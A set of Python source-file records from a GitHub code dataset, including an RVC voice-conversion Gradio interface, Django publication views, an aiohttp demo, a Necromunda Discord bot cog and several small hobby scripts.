gr.Number(label=\"变调(整数,半音数量,升八度12降八度-12)\", value=0)\r\n opt_input = gr.Textbox(label=\"指定输出文件夹\",value=\"opt\")\r\n f0method1=gr.Radio(label=\"选择音高提取算法,输入歌声可用pm提速,harvest低音好但巨慢无比\", choices=[\"pm\",\"harvest\"],value=\"pm\", interactive=True)\r\n with gr.Column():\r\n file_index2 = gr.Textbox(label=\"特征检索库文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\added_IVF677_Flat_nprobe_7.index\", interactive=True)\r\n file_big_npy2 = gr.Textbox(label=\"特征文件路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\logs\\mi-test-1key\\\\total_fea.npy\", interactive=True)\r\n index_rate2 = gr.Slider(minimum=0, maximum=1,label='检索特征占比', value=1,interactive=True)\r\n with gr.Column():\r\n dir_input = gr.Textbox(label=\"输入待处理音频文件夹路径(去文件管理器地址栏拷就行了)\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\")\r\n inputs = gr.File(file_count=\"multiple\", label=\"也可批量输入音频文件,二选一,优先读文件夹\")\r\n but1=gr.Button(\"转换\", variant=\"primary\")\r\n vc_output3 = gr.Textbox(label=\"输出信息\")\r\n but1.click(vc_multi, [spk_item, dir_input,opt_input,inputs, vc_transform1,f0method1,file_index2,file_big_npy2,index_rate2], [vc_output3])\r\n with gr.TabItem(\"伴奏人声分离\"):\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n 人声伴奏分离批量处理,使用UVR5模型。
        \r\n 不带和声用HP2,带和声且提取的人声不需要和声用HP5
        \r\n 合格的文件夹路径格式举例:E:\\codes\\py39\\\\vits_vc_gpu\\白鹭霜华测试样例(去文件管理器地址栏拷就行了)\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n dir_wav_input = gr.Textbox(label=\"输入待处理音频文件夹路径\",value=\"E:\\codes\\py39\\\\vits_vc_gpu_train\\\\todo-songs\")\r\n wav_inputs = gr.File(file_count=\"multiple\", label=\"也可批量输入音频文件,二选一,优先读文件夹\")\r\n with gr.Column():\r\n model_choose = gr.Dropdown(label=\"模型\", choices=uvr5_names)\r\n opt_vocal_root = gr.Textbox(label=\"指定输出人声文件夹\",value=\"opt\")\r\n opt_ins_root = gr.Textbox(label=\"指定输出乐器文件夹\",value=\"opt\")\r\n but2=gr.Button(\"转换\", variant=\"primary\")\r\n vc_output4 = gr.Textbox(label=\"输出信息\")\r\n but2.click(uvr, [model_choose, dir_wav_input,opt_vocal_root,wav_inputs,opt_ins_root], [vc_output4])\r\n with gr.TabItem(\"训练\"):\r\n gr.Markdown(value=\"\"\"\r\n step1:填写实验配置。实验数据放在logs下,每个实验一个文件夹,需手工输入实验名路径,内含实验配置,日志,训练得到的模型文件。\r\n \"\"\")\r\n with gr.Row():\r\n exp_dir1 = gr.Textbox(label=\"输入实验名\",value=\"mi-test\")\r\n sr2 = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0_3 = gr.Radio(label=\"模型是否带音高指导(唱歌一定要,语音可以不要)\", choices=[\"是\",\"否\"],value=\"是\", interactive=True)\r\n with gr.Group():#暂时单人的,后面支持最多4人的#数据处理\r\n gr.Markdown(value=\"\"\"\r\n step2a:自动遍历训练文件夹下所有可解码成音频的文件并进行切片归一化,在实验目录下生成2个wav文件夹;暂时只支持单人训练。\r\n \"\"\")\r\n with gr.Row():\r\n trainset_dir4 = gr.Textbox(label=\"输入训练文件夹路径\",value=\"E:\\语音音频+标注\\米津玄师\\src\")\r\n spk_id5 = gr.Slider(minimum=0, maximum=4, step=1, label='请指定说话人id', value=0,interactive=True)\r\n but1=gr.Button(\"处理数据\", variant=\"primary\")\r\n info1=gr.Textbox(label=\"输出信息\",value=\"\")\r\n but1.click(preprocess_dataset,[trainset_dir4,exp_dir1,sr2],[info1])\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n step2b:使用CPU提取音高(如果模型带音高),使用GPU提取特征(选择卡号)\r\n \"\"\")\r\n with gr.Row():\r\n with gr.Column():\r\n gpus6 = gr.Textbox(label=\"以-分隔输入使用的卡号,例如 0-1-2 使用卡0和卡1和卡2\",value=gpus,interactive=True)\r\n gpu_info9 = gr.Textbox(label=\"显卡信息\",value=gpu_info)\r\n with gr.Column():\r\n np7 = gr.Slider(minimum=0, maximum=ncpu, step=1, label='提取音高使用的CPU进程数', value=ncpu,interactive=True)\r\n f0method8 = gr.Radio(label=\"选择音高提取算法:输入歌声可用pm提速,高质量语音但CPU差可用dio提速,harvest质量更好但慢\", choices=[\"pm\", \"harvest\",\"dio\"], value=\"harvest\", interactive=True)\r\n but2=gr.Button(\"特征提取\", variant=\"primary\")\r\n info2=gr.Textbox(label=\"输出信息\",value=\"\",max_lines=8)\r\n but2.click(extract_f0_feature,[gpus6,np7,f0method8,if_f0_3,exp_dir1],[info2])\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"\r\n step3:填写训练设置,开始训练模型和索引\r\n \"\"\")\r\n with gr.Row():\r\n save_epoch10 = gr.Slider(minimum=0, maximum=50, step=1, label='保存频率save_every_epoch', value=5,interactive=True)\r\n total_epoch11 = gr.Slider(minimum=0, maximum=100, step=1, label='总训练轮数total_epoch', value=10,interactive=True)\r\n batch_size12 = gr.Slider(minimum=0, maximum=32, step=1, label='batch_size', value=4,interactive=True)\r\n if_save_latest13 = gr.Radio(label=\"是否仅保存最新的ckpt文件以节省硬盘空间\", choices=[\"是\", \"否\"], value=\"否\", interactive=True)\r\n if_cache_gpu17 = gr.Radio(label=\"是否缓存所有训练集至显存。10min以下小数据可缓存以加速训练,大数据缓存会炸显存也加不了多少速\", choices=[\"是\", \"否\"], value=\"否\", interactive=True)\r\n with gr.Row():\r\n pretrained_G14 = gr.Textbox(label=\"加载预训练底模G路径\", value=\"pretrained/f0G40k.pth\",interactive=True)\r\n pretrained_D15 = gr.Textbox(label=\"加载预训练底模D路径\", value=\"pretrained/f0D40k.pth\",interactive=True)\r\n sr2.change(change_sr2, [sr2,if_f0_3], [pretrained_G14,pretrained_D15])\r\n if_f0_3.change(change_f0, [if_f0_3, sr2], [np7, f0method8, pretrained_G14, pretrained_D15])\r\n gpus16 = gr.Textbox(label=\"以-分隔输入使用的卡号,例如 0-1-2 使用卡0和卡1和卡2\", value=gpus,interactive=True)\r\n but3 = gr.Button(\"训练模型\", variant=\"primary\")\r\n but4 = gr.Button(\"训练特征索引\", variant=\"primary\")\r\n but5 = gr.Button(\"一键训练\", variant=\"primary\")\r\n info3 = gr.Textbox(label=\"输出信息\", value=\"\",max_lines=10)\r\n but3.click(click_train,[exp_dir1,sr2,if_f0_3,spk_id5,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17],info3)\r\n but4.click(train_index,[exp_dir1],info3)\r\n but5.click(train1key,[exp_dir1,sr2,if_f0_3,trainset_dir4,spk_id5,gpus6,np7,f0method8,save_epoch10,total_epoch11,batch_size12,if_save_latest13,pretrained_G14,pretrained_D15,gpus16,if_cache_gpu17],info3)\r\n\r\n with gr.TabItem(\"ckpt处理\"):\r\n with gr.Group():\r\n gr.Markdown(value=\"\"\"模型融合,可用于测试音色融合\"\"\")\r\n with gr.Row():\r\n ckpt_a = gr.Textbox(label=\"A模型路径\", value=\"\", interactive=True)\r\n ckpt_b = gr.Textbox(label=\"B模型路径\", value=\"\", interactive=True)\r\n alpha_a = gr.Slider(minimum=0, maximum=1, label='A模型权重', value=0.5, interactive=True)\r\n with gr.Row():\r\n sr_ = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0_ = gr.Radio(label=\"模型是否带音高指导\", choices=[\"是\",\"否\"],value=\"是\", interactive=True)\r\n info__ = gr.Textbox(label=\"要置入的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n name_to_save0=gr.Textbox(label=\"保存的模型名不带后缀\", value=\"\", max_lines=1, interactive=True)\r\n with gr.Row():\r\n but6 = gr.Button(\"融合\", variant=\"primary\")\r\n info4 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but6.click(merge, [ckpt_a,ckpt_b,alpha_a,sr_,if_f0_,info__,name_to_save0], info4)#def merge(path1,path2,alpha1,sr,f0,info):\r\n with gr.Group():\r\n gr.Markdown(value=\"修改模型信息(仅支持weights文件夹下提取的小模型文件)\")\r\n with gr.Row():\r\n ckpt_path0 = gr.Textbox(label=\"模型路径\", value=\"\", interactive=True)\r\n info_=gr.Textbox(label=\"要改的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n name_to_save1=gr.Textbox(label=\"保存的文件名,默认空为和源文件同名\", value=\"\", max_lines=8, interactive=True)\r\n with gr.Row():\r\n but7 = gr.Button(\"修改\", variant=\"primary\")\r\n info5 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but7.click(change_info, [ckpt_path0,info_,name_to_save1], info5)\r\n with gr.Group():\r\n gr.Markdown(value=\"查看模型信息(仅支持weights文件夹下提取的小模型文件)\")\r\n with gr.Row():\r\n ckpt_path1 = gr.Textbox(label=\"模型路径\", value=\"\", interactive=True)\r\n but8 = gr.Button(\"查看\", variant=\"primary\")\r\n info6 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n but8.click(show_info, [ckpt_path1], info6)\r\n with gr.Group():\r\n gr.Markdown(value=\"模型提取(输入logs文件夹下大文件模型路径),适用于训一半不想训了模型没有自动提取保存小文件模型,或者想测试中间模型的情况\")\r\n with gr.Row():\r\n ckpt_path2 = gr.Textbox(label=\"模型路径\", value=\"E:\\codes\\py39\\logs\\mi-test_f0_48k\\\\G_23333.pth\", interactive=True)\r\n save_name = gr.Textbox(label=\"保存名\", value=\"\", interactive=True)\r\n sr__ = gr.Radio(label=\"目标采样率\", choices=[\"32k\",\"40k\",\"48k\"],value=\"40k\", interactive=True)\r\n if_f0__ = gr.Radio(label=\"模型是否带音高指导,1是0否\", choices=[\"1\",\"0\"],value=\"1\", interactive=True)\r\n info___ = gr.Textbox(label=\"要置入的模型信息\", value=\"\", max_lines=8, interactive=True)\r\n but9 = gr.Button(\"提取\", variant=\"primary\")\r\n info7 = gr.Textbox(label=\"输出信息\", value=\"\", max_lines=8)\r\n ckpt_path2.change(change_info_,[ckpt_path2],[sr__,if_f0__])\r\n but9.click(extract_small_model, [ckpt_path2,save_name,sr__,if_f0__,info___], info7)\r\n\r\n with gr.TabItem(\"招募音高曲线前端编辑器\"):\r\n gr.Markdown(value=\"\"\"加开发群联系我xxxxx\"\"\")\r\n with gr.TabItem(\"点击查看交流、问题反馈群号\"):\r\n gr.Markdown(value=\"\"\"xxxxx\"\"\")\r\n\r\n # app.launch(server_name=\"0.0.0.0\",server_port=7860)\r\n # app.queue(concurrency_count=511, max_size=1022).launch(server_name=\"127.0.0.1\",inbrowser=True,server_port=7861,quiet=True)\r\n app.queue(concurrency_count=511, max_size=1022).launch(server_name=\"0.0.0.0\",inbrowser=True,server_port=7865,quiet=True)","repo_name":"KaiservonAfrika/backupRVC","sub_path":"infer-web.py","file_name":"infer-web.py","file_ext":"py","file_size_in_byte":37603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26597433176","text":"def compare(choice1, choice2):\n \"\"\"play rock, paper, scissors\"\"\"\n if choice1 == choice2:\n print(\"Tie!\")\n elif choice1 == 'rock':\n if choice2 == 'scissors':\n print(\"rock wins\")\n elif choice1 == 'rock':\n if choice2 == 'paper':\n print(\"paper wins\")\n elif choice1 == 'scissors':\n if choice2 == 'paper':\n print(\"scissors wins\")\n elif choice1 == 'scissors':\n if choice2 == 'rock':\n print(\"rock wins\")\n elif choice1 == 'paper':\n if choice2 == 'rock':\n print(\"paper wins\")\n elif choice1 == 'paper':\n if choice2 == 'scissors':\n print(\"scissors wins\")\n\nrounds = int(raw_input(\"enter number of rounds\"))\nplayer1_name = raw_input(\"enter player1 name: \")\nplayer2_name = raw_input(\"enter player2 name: \")\ncounter = 0\nwhile counter != rounds:\n choice1 = choice()\n choice2 = choice()\n choice3 = choice()\n compare(choice1, choice2)\n counter +=1\nprint (\"{} and {} would you like to play again?\".format(player1_name, player2_name))\n","repo_name":"agmacd3842/rps","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23668730716","text":"from django.db.models import Q\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import status, viewsets\nfrom rest_framework.filters import SearchFilter\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom npo_publication.models import Publication\nfrom npo_publication.serializers import PublicationSerializer, PublicationFavoriteSerializer, \\\n PublicationFilterSearchSerializer\n\n\nclass PublicationAPIView(APIView, PageNumberPagination):\n allow_methods = ['GET', 'POST']\n serializer_class = PublicationSerializer\n\n def get(self, request, *args, **kwargs):\n query = request.query_params.get('query', '')\n pub = Publication.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query))\n results = self.paginate_queryset(pub,\n request,\n view=self)\n return self.get_paginated_response(self.serializer_class(results,\n many=True,\n context={'request': request}).data)\n\n def post(self, request, *args, **kwargs):\n title = request.data.get('title')\n description = request.data.get('description')\n created_date = request.data.get('created_date')\n file = request.data.get('file')\n pub = Publication.objects.create(title=title,\n description=description,\n created_date=created_date,\n file=file)\n\n pub.save()\n return Response(data=self.serializer_class(pub).data,\n status=status.HTTP_200_OK)\n\n\nclass PublicationDetailAPIView(APIView):\n allow_methods = ['GET', 'PUT', 'DELETE']\n serializer_class = PublicationSerializer\n\n def get(self, request, id):\n pub = Publication.objects.get(id=id)\n return Response(data=self.serializer_class(pub).data)\n\n def put(self, request, id):\n pub = Publication.objects.get(id=id)\n title = request.data.get('title')\n description = request.data.get('description')\n created_date = request.data.get('created_date')\n file = request.data.get('file')\n pub.title = title\n pub.description = description\n pub.file = file\n\n pub.save()\n return Response(data=self.serializer_class(pub).data,\n status=status.HTTP_200_OK)\n\n def delete(self, request, id):\n pub = Publication.objects.get(id=id)\n pub.delete()\n\n return Response(data=self.serializer_class(pub).data,\n status=status.HTTP_202_ACCEPTED)\n\n\nclass PublicationFavoriteAPIView(APIView):\n allow_methods = ['GET', 'POST', 'DELETE']\n serializers_class = PublicationSerializer\n\n def get(self, request):\n checkbox = Publication.objects.filter(user=request.user)\n return Response(data=PublicationFavoriteSerializer(checkbox).data)\n\n def post(self, request):\n pub_id = int(request.data.get('pub_id'))\n checkbox = Publication.objects.get(pub_id=pub_id,\n user=request.user)\n checkbox.save()\n return Response(data=PublicationFavoriteSerializer(checkbox).data,\n status=status.HTTP_201_CREATED)\n\n def delete(self, request):\n pub_id = int(request.data.get('pub_id'))\n checkbox = Publication.objects.get(pub_id=pub_id,\n user_id=request.user)\n checkbox.delete()\n return Response(data=PublicationFavoriteSerializer(checkbox).data,\n status=status.HTTP_204_NO_CONTENT)\n\n\nclass PublicationFilterSearchView(viewsets.ModelViewSet):\n queryset = Publication.objects.all()\n serializer_class = PublicationFilterSearchSerializer\n filter_backends = [DjangoFilterBackend, SearchFilter]\n filterset_fields = ['title', 'description']\n search_fields = ['=title', '=description']\n ordering_fields = ['title']\n ordering = ['title']","repo_name":"akkbaeva/non_profit","sub_path":"npo_publication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1605108474","text":"import requests\nimport time\nimport asyncio\nimport aiohttp\nfrom requests import session\nfrom aiohttp import ClientSession\n\n\ndef get_api(s: session):\n url = \"https://mocki.io/v1/d4867d8b-b5d5-4a48-a4ab-79131b5809b8\"\n req = s.get(url).json()\n print(req)\n\n\ndef main():\n s = session()\n for i in range(3):\n get_api(s)\n\n\nasync def aio_get_api(s: ClientSession):\n url = \"https://mocki.io/v1/d4867d8b-b5d5-4a48-a4ab-79131b5809b8\"\n req = await s.get(url)\n \n print(await req.json())\n\n\nasync def aio_main():\n async with ClientSession() as session:\n task = [aio_get_api(session) for _ in range(3)]\n await asyncio.gather(*task)\n\nif __name__ == \"__main__\":\n s = time.perf_counter()\n asyncio.run(aio_main())\n # main()\n elapsed = time.perf_counter() - s\n print(f\"Code runtime: {elapsed}\")\n","repo_name":"wangshouh/asynio_blog","sub_path":"asynio_basic.py","file_name":"asynio_basic.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3286172935","text":"import rospy\nfrom tf import TransformListener, Transformer\nimport tf.transformations\nimport numpy as np\n\n\nclass Axis_transform:\n def __init__(self):\n self.listener = TransformListener()\n\n\n def tf_camera_to_base(self, camera_point, multi_dimention=False):\n if multi_dimention:\n return self.transform_coordinate_array('head_rgbd_sensor_rgb_frame', 'base_link', camera_point)\n else:\n return self.transform_coordinate('head_rgbd_sensor_rgb_frame', 'base_link',\n [camera_point[0], camera_point[1], camera_point[2]])\n\n\n def transform_coordinate_array(self, from_tf, to_tf, src_point_array):\n # src_point must be xyz!\n while not rospy.is_shutdown():\n try:\n (trans, rot) = self.listener.lookupTransform(to_tf, from_tf, rospy.Time(0))\n break\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n continue\n R = self.listener.fromTranslationRotation(trans, rot)\n src_point_array = np.concatenate([src_point_array, np.ones((src_point_array.shape[0], 1))], axis=1)\n out = np.dot(R, src_point_array.T)\n out = out.T\n return out[:, 0:-1]\n\nif __name__ == '__main__':\n rospy.init_node('test_hsr_tf')\n axis_tf = Axis_transform()\n print(axis_tf.get_pose())\n # origin = np.array(([0.09911522, 0.04511706, 1.01600003],\n # [0.09911522, 0.04511706, 1.01600003]))\n # print(origin)\n # base_link = axis_tf.transform_coordinate_array('head_rgbd_sensor_link', 'base_link', origin)\n # print(base_link)\n # camera_link = axis_tf.transform_coordinate_array('base_link', 'head_rgbd_sensor_link', base_link)\n # print(camera_link)\n\n","repo_name":"sehandev/AISys-JYD","sub_path":"utils_yolo/axis_transform.py","file_name":"axis_transform.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35426465090","text":"# Contains command for Necromunda related content and functions.\n# Started: 2021-01-17\n\nimport discord\nimport json\nimport random\nimport re\n\nfrom discord.ext import commands\nfrom KrigsBot import logger\nfrom KrigsBot import logCommand\n\n### Data Variables ###\nNC_SKILLS = \"./Data/Necromunda_Skills.json\"\n\n\nclass Necromunda(commands.Cog, name=\"Necromunda\"):\n def __init__(self, bot):\n self.bot = bot\n\n ### Command - Necromunda ###\n @commands.group(\n aliases=['nc', 'necro'],\n invoke_without_command=True,\n case_insensitive=True\n )\n async def Necromunda(self, ctx):\n await ctx.send_help(ctx.command)\n\n\n @Necromunda.command(\n help=\"Perform a roll (Injury, OOA, Recovery)\"\n )\n async def roll(self, ctx, type_of_roll: str):\n logCommand(ctx)\n\n if type_of_roll.lower() == \"injury\":\n \n roll_result = random.randint(1,6)\n \n FW_descriptions =[\n 'THEY HAVE WRONGED US!',\n '...No, what you have are bullets, and the hope that when those bullets run out I will no longer be standing...',\n 'Wounds to be tended; lessons to be learned.',\n 'THE FLESH IS WEAK!',\n 'Remind yourself that overconfidence is a *slow* and *insidious* killer.'\n ]\n\n SI_descriptions =[\n 'How quickly the tide turns...',\n 'Death waits for the slightest lapse in concentration...',\n 'Dazed, reeling... about to break.',\n 'Ringing ears, blurred vision - the end approaches...',\n 'Teetering on the brink, facing the abyss...'\n ]\n\n OOA_descriptions =[\n 'TELL YOUR GODS I\\'M COMING!',\n 'OH, THEY\\' GONNA HAVE TO GLUE YOU BACK TOGETHER... IN.HELL!',\n 'Another life wasted in the pursuit of glory and gold.',\n 'A life spent not overcharging plasma, is a life lived in cowardice.',\n 'There can be no hope in this hell, no hope at all...'\n ]\n\n if roll_result in range(1,3):\n result = \"Flesh Wound\"\n result_text = \"The fighter suffers a *Flesh Wound*, reducing their Toughness characteristic by 1.\\nIf a fighter is reduced to Toughness 0, they go *Out Of Action*.\"\n result_color = discord.Color.green()\n result_description = random.choice(FW_descriptions)\n fileName = \"necromunda_FW.png\"\n file = discord.File(\"./Images/necromunda_FW.png\", filename=fileName)\n\n\n elif roll_result in range(3,6):\n result = \"Seriously Injured\"\n result_text = \"The fighter is *Prone* and laid face-down.\\nThey may successfully recover in a later end phase. If this injury was inflicted in close combat, the fighter may be vulnerable to a *Coup De Grace* action. \"\n result_color = discord.Color.gold()\n result_description = random.choice(SI_descriptions)\n fileName = \"necromunda_SI.png\"\n file = discord.File(\"./Images/necromunda_SI.png\", filename=fileName)\n\n else:\n result = \"Out Of Action\"\n result_text = \"The fighter is immediately removed from play.\"\n result_color = discord.Color.red()\n result_description = random.choice(OOA_descriptions)\n fileName = \"necromunda_OOA.png\"\n file = discord.File(\"./Images/necromunda_OOA.png\", filename=fileName)\n\n responseEmbed = discord.Embed(\n title= f\"Injury Dice: {result}\",\n color = result_color,\n description = f\"*{result_description}*\"\n )\n\n responseEmbed.add_field(name=\"Effect\",inline=False,value=result_text)\n responseEmbed.add_field(name=\"Dice roll\",inline=True,value=roll_result)\n responseEmbed.set_image(url=f\"attachment://{fileName}\")\n\n responseEmbed.set_footer(text=\"Source: Necromunda Rulebook (2018); p.71\")\n\n await ctx.send(file = file, embed=responseEmbed)\n\n\n @Necromunda.command(\n aliases=['skill']\n )\n async def skills(self, ctx, *, query=None):\n logCommand(ctx)\n \n\n with open(NC_SKILLS) as file:\n skillList = json.load(file)\n\n uniqueSkillGroup = sorted(set([skillList[skill]['skill_set'] for skill in skillList]))\n\n # Case 1: Invoked with no command, or the 'list' argument\n # Show the invoker a list of all available skills\n if query == None or query == \"list\":\n\n listEmbed = discord.Embed(\n title=f\"Necromunda Skill List\",\n color=discord.Color.blue(),\n description=f\"The following Skillset and skills are loaded\"\n )\n\n for skillgroup in uniqueSkillGroup:\n\n formattedskills = '\\n'.join([skillList[skill]['name'] for skill in skillList if skillList[skill]['skill_set'] == skillgroup])\n listEmbed.add_field(name=f'{skillgroup}', inline=True, value=f\"{formattedskills}\")\n\n await ctx.send(embed=listEmbed)\n\n # Case 2: Invoked with a skill set.\n # NOTE: Because Skill Sets are values, we shift the query into Title-case to match our values.\n elif query.title() in uniqueSkillGroup:\n\n output = \"\"\n\n \n for entry in [[skillList[skill]['skill_number'],skillList[skill]['name']] for skill in skillList if skillList[skill]['skill_set'] == query.title()]:\n output += f\"{entry[0]} - {entry[1]}\\n\"\n\n listEmbed = discord.Embed(\n title=f'Necromunda Skill Set: {query}',\n color=discord.Color.blue(),\n description=f'The {query} skill set contains the following skills:\\n\\n' + output)\n\n await ctx.send(embed=listEmbed)\n\n\n # Case 3: Invoked with a specific skill\n elif query in skillList:\n\n listEmbed = discord.Embed(\n title=f\"Necromunda skill: {skillList[query]['name']}\",\n color=discord.Color.blue(),\n description=f\"{skillList[query]['definition']}\")\n\n listEmbed.add_field(name='Skill Set',inline=True,value=f\"{skillList[query]['skill_set']}\")\n listEmbed.add_field(name='Skill Number',inline=True,value=f\"{skillList[query]['skill_number']}\")\n listEmbed.set_footer(text=f\"Source: {skillList[query]['source']}\")\n\n await ctx.send(embed=listEmbed)\n\n\n # Case 4: No hit in either the skill sets or skill list; lets try a regex match or bail with an apology\n else:\n logger.info(f\"No hit: Did not find term: {query} in Necromunda_Skills.json\")\n termlist = [element for element in skillList]\n \n regex = re.compile(f\".*{query}.*\")\n\n resultlist = list(filter(regex.match, termlist))\n\n if resultlist:\n response = \"```\"\n for term in resultlist:\n response += f\"- {skillList[term]['name'].ljust(22)}{skillList[term]['skill_set']}\\n\"\n \n response += \"```\"\n\n embedResult = discord.Embed(\n title=f\"No hits for {query} in Necromunda Skills\",\n color= discord.Color.red(),\n description=f\"No exact match found for {query}, but there were some partial hits:\"\n )\n\n embedResult.add_field(name=\"Partial hits\",inline=False,value=response)\n\n await ctx.send(embed=embedResult)\n\n else:\n\n embedResult = discord.Embed(\n title=f\"No hits at all for {query} in Necromunda Skills\",\n color=discord.Color.red(),\n description=f\"No hits at all for {query}; Perhaps it's called something else?\\n\\nTry '!nc skills list' for a list of all loaded skills.\"\n )\n\n await ctx.send(embed=embedResult)\n\n\n\n\n\ndef setup(bot):\n bot.add_cog(Necromunda(bot))\n","repo_name":"TurbulentQuasarPhenotype/KrigsBot","sub_path":"cogs/necromunda.py","file_name":"necromunda.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73643521171","text":"x=int(input())\nl = list(map(int,input().split()))\nc=0\nfor i in l:\n c+=i\n m = c//len(l)\nfor j in l:\n if m==j:\n print('True')\n break\nelse: print('False')","repo_name":"Nagendrasomisetti/codemind-python","sub_path":"Average_element_is_in_array_or_not.py","file_name":"Average_element_is_in_array_or_not.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19622454235","text":"from collections import defaultdict\nclass Solution:\n def longestConsecutive(self):\n nums = [100,4,200,1,3,2, 101]\n counts = []\n count = 0\n checker = 0 \n dd = defaultdict(int) \n s = set(nums)\n outputs = []\n start = False\n while checker != len(nums): \n if nums[checker] - 1 not in s and start == False: \n start = True\n else:\n checker += 1 \n start = False\n if start == True: \n count += 1 \n if nums[checker] + 1 not in s:\n start = False\n checker += 1 \n outputs.append(count)\n count = 0 \n else:\n nums[checker] += 1\n count += 1 \n print(outputs)\n\nsol = Solution()\nsol.longestConsecutive()","repo_name":"Lumiin0us/DSA_for_relaxation","sub_path":"longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34205436433","text":"import boto3\nimport traceback\nimport json\n\nmedialive_client = boto3.client(\"medialive\")\ndef lambda_handler(event, context):\n\n print(f\"Lambda got the following event:\\n{json.dumps(event)}\")\n try:\n if 'ChunkSourceDetail' in event['detail']:\n if 'ChannelId' in event['detail']['ChunkSourceDetail']:\n channel_id = event['detail']['ChunkSourceDetail']['ChannelId']\n response = medialive_client.describe_channel(\n ChannelId=channel_id\n )\n\n # Only start the channel if its Idle\n if response['State'] == 'IDLE':\n medialive_client.start_channel(\n ChannelId=channel_id\n )\n print(f\"Started Channel = {channel_id}\")\n else:\n print(f\"Channel = {channel_id} in Running State. Ignoring.\")\n except Exception as e:\n print(f\"Encountered an exception while starting MediaLive channel {str(e)}\")\n print(traceback.format_exc())\n raise\n ","repo_name":"awslabs/aws-media-replay-engine","sub_path":"source/backend/event-life-cycle/runtime/lambda/ChannelStarter.py","file_name":"ChannelStarter.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"66"} +{"seq_id":"74170607889","text":"from argparse import ArgumentParser\nfrom argparse import Namespace\n\nhi = Namespace()\nprint(hi)\nhi.hi = 1\nprint(hi.hi)\ndef get_args():\n parser = ArgumentParser(description='PyTorch/torchtext SNLI example')\n# parser.add_argument('--epochs', type=int, default=50)\n args = parser.parse_args()\n return args\n\nargs = get_args()\nprint(args)\n#print(args.epochs)\n\nargs.hi = 10\n\nprint(args.hi)","repo_name":"humorbeing/python_github","sub_path":"_SSSSSSandbox/playground_something/uu0003.py","file_name":"uu0003.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70706483731","text":"import numpy as np\nimport scipy.optimize\nimport sklearn.metrics\n\n\ndef single_eval(true_vps, estimated_vps, K_inverse, missing_vp_penalty=90.):\n\n true_num_vps = true_vps.shape[0]\n true_vds = (K_inverse * np.matrix(true_vps).T).T\n for vi in range(true_vds.shape[0]):\n true_vds[vi,:] /= np.maximum(np.linalg.norm(true_vds[vi,:]), 1e-16)\n\n estm_num_vps = estimated_vps.shape[0]\n num_missing_vps = true_num_vps-estm_num_vps\n num_vp_penalty = np.maximum(num_missing_vps, 0)\n\n estm_vds = (K_inverse * np.matrix(estimated_vps).T).T\n for vi in range(estm_vds.shape[0]):\n estm_vds[vi,:] /= np.maximum(np.linalg.norm(estm_vds[vi,:]), 1e-16)\n\n cost_matrix = np.arccos(np.abs(np.array(true_vds * estm_vds.T))) * 180. / np.pi\n\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(cost_matrix)\n\n errors = []\n for ri, ci in zip(row_ind, col_ind):\n errors += [cost_matrix[ri,ci]]\n if missing_vp_penalty > 0:\n errors += [missing_vp_penalty for _ in range(num_vp_penalty)]\n\n return errors, num_missing_vps\n\n\ndef calc_auc(error_array, cutoff=10.):\n\n error_array = error_array.squeeze()\n error_array = np.sort(error_array)\n num_values = error_array.shape[0]\n\n plot_points = np.zeros((num_values, 2))\n\n midfraction = 1.\n\n for i in range(num_values):\n fraction = (i + 1) * 1.0 / num_values\n value = error_array[i]\n plot_points[i, 1] = fraction\n plot_points[i, 0] = value\n if i > 0:\n lastvalue = error_array[i - 1]\n if lastvalue < cutoff < value:\n midfraction = (lastvalue * plot_points[i - 1, 1] + value * fraction) / (value + lastvalue)\n\n if plot_points[-1, 0] < cutoff:\n plot_points = np.vstack([plot_points, np.array([cutoff, 1])])\n 